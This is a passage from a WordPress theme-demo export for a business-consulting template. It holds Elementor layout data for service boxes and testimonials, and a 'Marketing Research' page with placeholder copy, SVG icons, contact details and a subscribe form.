com\/images\/hourglass.svg","id":1872},"library":"svg"},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#52C5B633","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"bg_hover_des_color":"#FFFFFF","bg_hover_box":"#061E2F"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"d45a6c2","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a93d254","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#52C5B633","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"bg_hover_des_color":"#FFFFFF","bg_hover_box":"#061E2F"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"41d2371","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_desktop":"hidden-desktop","hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[],"isInner":true}],"isInner":true},{"id":"a342583","elType":"section","settings":{"gap":"extended","structure":"30","background_background":"classic","layout":"full_width"},"elements":[{"id":"4685821","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"34b430f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#52C5B633","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"bg_hover_des_color":"#FFFFFF","bg_hover_box":"#061E2F"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"793fbd6","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"ed2b68f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/deal.svg","id":887},"library":"svg"},"title":"Support Functions","des":"Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":48,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#52C5B633","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"bg_hover_des_color":"#FFFFFF","bg_hover_box":"#061E2F"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"58be6ce","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"798624b","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/portfolio.svg","id":666},"library":"svg"},"title":"Finance Planning","des":"We identify the mission, goals and strategic priorities of a business project or non-profit organization.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#52C5B633","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"bg_hover_des_color":"#FFFFFF","bg_hover_box":"#061E2F"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"e92783c","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-icon.jpg","id":890},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"117","right":"0","bottom":"195","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"90","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false}},"elements":[{"id":"374524a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4de5108","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"f57a371","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"9728125","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"00c712c","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"2dd99d7","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"870bb75","elType":"section","settings":{"structure":"30","layout":"full_width"},"elements":[{"id":"40edabd","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true},{"id":"cfe5e81","elType":"column","settings":{"_column_size":33,"_inline_size":66.13200000000000500222085975110530853271484375},"elements":[{"id":"a078a65","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":2580},"tname":"Oliver Simson","tjob":"client of company","_id":"4b608b2"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"Manager","_id":"f2a510a"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"Designer","_id":"2012bf3"}],"arrows":"true","dots":"false","loop":"true","arrow_spacing":{"unit":"px","size":-127,"sizes":[]},"tcontent_color":"#616161","name_typography_typography":"custom","name_typography_font_weight":"400"},"elements":[],"widgetType":"itestimonials2"}],"isInner":true},{"id":"79d9b22","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"dc04503","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"background_background":"classic","padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"3cb066f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3bffb05","elType":"section","settings":{"content_position":"middle","structure":"20","background_background":"classic","background_color":"#52C5B6","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"dab11b4","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"2f39639","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"f0f5c00","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"71cc9d5","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:7:{s:6:"column";a:3:{s:5:"count";i:23;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:23;s:19:"_inline_size_tablet";i:14;}}s:8:"advanced";a:2:{s:19:"_section_responsive";a:3:{s:11:"hide_tablet";i:3;s:11:"hide_mobile";i:3;s:12:"hide_desktop";i:1;}s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:2;s:5:"title";i:2;s:11:"header_size";i:2;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:13:"style_section";a:7:{s:9:"stitle_bg";i:2;s:27:"title_typography_typography";i:2;s:33:"title_typography_font_size_mobile";i:2;s:28:"stitle_typography_typography";i:2;s:27:"stitle_typography_font_size";i:2;s:12:"stitle_color";i:2;s:29:"stitle_typography_font_weight";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:10;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:7;}s:14:"section_layout";a:4:{s:6:"layout";i:6;s:3:"gap";i:4;s:16:"content_position";i:1;s:13:"content_width";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:7;s:14:"padding_mobile";i:4;s:14:"padding_tablet";i:2;s:13:"margin_tablet";i:2;s:6:"margin";i:1;s:7:"z_index";i:1;s:13:"margin_mobile";i:1;}s:19:"_section_responsive";a:1:{s:12:"hide_desktop";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:4;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:3:{s:13:"border_radius";i:1;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"iiconbox1";a:3:{s:5:"count";i:8;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"icon_font";i:8;s:5:"title";i:8;s:3:"des";i:8;s:4:"link";i:8;}}s:5:"style";a:3:{s:18:"style_icon_section";a:3:{s:9:"is_border";i:8;s:9:"icon_size";i:8;s:7:"icon_bg";i:8;}s:21:"style_content_section";a:2:{s:27:"title_typography_typography";i:8;s:26:"title_typography_font_size";i:8;}s:17:"style_box_section";a:2:{s:18:"bg_hover_des_color";i:8;s:12:"bg_hover_box";i:8;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:5;s:15:"_padding_mobile";i:3;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:20:"section_testimonials";a:4:{s:12:"testi_slider";i:1;s:6:"arrows";i:1;s:4:"dots";i:1;s:4:"loop";i:1;}}s:5:"style";a:3:{s:9:"style_nav";a:1:{s:13:"arrow_spacing";i:1;}s:13:"style_general";a:1:{s:14:"tcontent_color";i:1;}s:11:"style_tinfo";a:2:{s:26:"name_typography_typography";i:1;s:27:"name_typography_font_weight";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:11:"header_size";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:3:{s:11:"title_color";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Marketing Research</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/marketing-research/</link>
		<pubDate>Mon, 14 Sep 2020 07:28:19 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=898</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box1-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box1-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" />											
			<h3>We Conduct Marketing Research</h3>		
		<p>It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.</p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation
</h6>		
					90				
			<h6>finance strategy</h6>		
		<h3>We are Always Ready to Assist Our Clients</h3><p>developing financial processes and procedures</p>		
			<h4>How It Works & How We Do It</h4>		
		<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.
									</li>
						</ul>
		<blockquote>“I cannot give you the formula for success, but I can give you the 
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>		
			<h4>Business Planning & Strategy</h4>		
										<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home5.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home5-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px" />											
		Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.
Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.		
			<h5>Services</h5>		
					<ul>
							<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										marketing research
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Organizational Audit
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										business consulting
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										project management
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										support functions
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										finance planning
											</a>
									</li>
						</ul>
			<h5>Contacts</h5>		
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<a href="mailto:maxbizz@mail.com">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
				<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a>
				</h6>
								<p>maxbizz@mail.com</p>
											<a href="#">
							<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home5.jpg" alt="" loading="lazy" />								</a>
			<h4>Ready to Get Started?</h4>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-finance/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741" />
<input type="hidden" name="_wpcf7_version" value="5.3" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /><br />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><br />
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>898</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:28:19]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:28:19]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[marketing-research]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
